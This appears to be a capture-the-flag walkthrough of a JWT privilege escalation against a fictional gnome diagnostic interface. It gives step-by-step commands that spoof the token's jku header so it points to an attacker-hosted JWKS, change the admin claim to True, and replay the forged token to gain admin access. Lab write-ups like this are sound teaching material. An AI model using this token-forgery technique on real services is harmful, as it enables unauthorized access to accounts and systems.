Hey - I’m Paul. I’ve been at Counter Hack since 2024 and love pentesting web, API, and mobile apps. When I’m not hacking, I’m into board games, hiking, or paddle boarding.
I’m excited about privilege escalation - and that’s your job here. I have a low-privilege account for a Gnome Diagnostic Interface at gnome-48371.atnascorp (creds: gnome:SittingOnAShelf). The gnomes are getting suspicious updates and I need admin access to see what’s happening.
Task: Find a way to escalate privileges and gain admin access to the diagnostic interface.
First, let's take another look at the notes:
Hi, Paul here. Welcome to my web-server. I've been using it for JWT analysis.
I've discovered the Gnomes have a diagnostic interface that authenticates to an Atnas identity provider.
Unfortunately the gnome:SittingOnAShelf credentials discovered in 2015 don't have sufficient access to view the gnome diagnostic interface.
I've kept some notes in ~/notes
Can you help me gain access to the Gnome diagnostic interface and discover the name of the file the Gnome downloaded? When you identify the filename, enter it in the badge.
Let's go through the individual steps in the notes. First, we log in with the simple credentials and receive a JWT token, which we analyze:
paul@paulweb:~$ curl -X POST --data-binary $'username=gnome&password=SittingOnAShelf&return_uri=http%3A%2F%2Fgnome-48371.atnascorp%2Fauth' http://idp.atnascorp/login
paul@paulweb:~$ jwt_tool.py eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2MjgxMDQwOSwiZXhwIjoxNzYyODE3NjA5LCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.C1VofCsWUGqwTvDqHq8702GY7KjH_S9KE62blYK_JKepPGsOknTWcqgnG2msNRfdQfNKh0NOplAEm4gHkCRO77qL9RykTeDI7EzkcdgP5c4wIUwTrndK4bTKmIfKMER_5gB6gfosi0wdVD5kSldcGGEuIojavl5YFByd6NDfaaDrx8OKrNvwfCgaC09LdRLrrPafGz2Ero6rwLEbteiiz6FthRccQvfKa9Q1l6WIbry4Zf96elYOtYX2JjNRKhK5fB8vFKThjzGIWJUTMzhHtw8V4KSRSO3NbdpQS5um-zX4mql0a3LV5DT_sDy7FH9G07zC-xlXXlhmkeyeQ85GgQ
...
[+] jku = "http://idp.atnascorp/.well-known/jwks.json"
...
[+] admin = False
We the JWT uses JWKS. Let's try a JWKS spoofing attack running on our own web server.
paul@paulweb:~$ cp .jwt_tool/jwttool_custom_jwks.json www/jwks.json
paul@paulweb:~$ vim www/jwks.json # change "kid":"idp-key-2025"
Next, we use the jwt_tool to configure the payload
paul@paulweb:~$ jwt_tool.py eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2MjgxMDQwOSwiZXhwIjoxNzYyODE3NjA5LCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.C1VofCsWUGqwTvDqHq8702GY7KjH_S9KE62blYK_JKepPGsOknTWcqgnG2msNRfdQfNKh0NOplAEm4gHkCRO77qL9RykTeDI7EzkcdgP5c4wIUwTrndK4bTKmIfKMER_5gB6gfosi0wdVD5kSldcGGEuIojavl5YFByd6NDfaaDrx8OKrNvwfCgaC09LdRLrrPafGz2Ero6rwLEbteiiz6FthRccQvfKa9Q1l6WIbry4Zf96elYOtYX2JjNRKhK5fB8vFKThjzGIWJUTMzhHtw8V4KSRSO3NbdpQS5um-zX4mql0a3LV5DT_sDy7FH9G07zC-xlXXlhmkeyeQ85GgQ -X s -ju http://paulweb.neighborhood/jwks.json -T
Token payload values:
[5] admin = False
...
Please enter new value and hit ENTER
> True
We send the modified request and thus obtain admin access:
paul@paulweb:~$ curl -v http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9wYXVsd2ViLm5laWdoYm9yaG9vZC9qd2tzLmpzb24iLCJraWQiOiJpZHAta2V5LTIwMjUiLCJ0eXAiOiJKV1QifQ.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2MjgxMDQwOSwiZXhwIjoxNzYyODE3NjA5LCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6dHJ1ZX0.QDsK2ZZKc07hUNjeRcW49YFt18nNHyyKn4YIps9Gl0fjTNmWWmdjI7IY75wgZjqRrW91lFCuhCxcN027CHhtUnE7srby91gDXYMqGGyCeL0JpzJfw7b0rRnpTLj7UgUqTeq4NwEkkYManOsZZIQbGvmGd4MqhlTVJzHac7uSfx2OtkgMOPooSAC2VDVCW9zbX5ZkdJxt29gIupo-40KycAC3pySkxs8QmqdvdekvJVvQOZIcISODhSgEdgnPUV3DI84m39uZE5nCqD--d4ezJABy4NIbTMu4O46vpQQVW2-d2wbniL79Br3i7jOmUcnmvSYNOysy2DkNho1Nbv8dVw
paul@paulweb:~$ curl -H 'Cookie: session=eyJhZG1pbiI6dHJ1ZSwidXNlcm5hbWUiOiJnbm9tZSJ9.aRJbdw.w90200K9I4jxu2bYZoqksQGnpN8' http://gnome-48371.atnascorp/diagnostic-interface
...
2025-11-10 21:33:16: Checking for updates.<br/>
2025-11-10 21:33:16: Firmware Update available: refrigeration-botnet.bin<br/>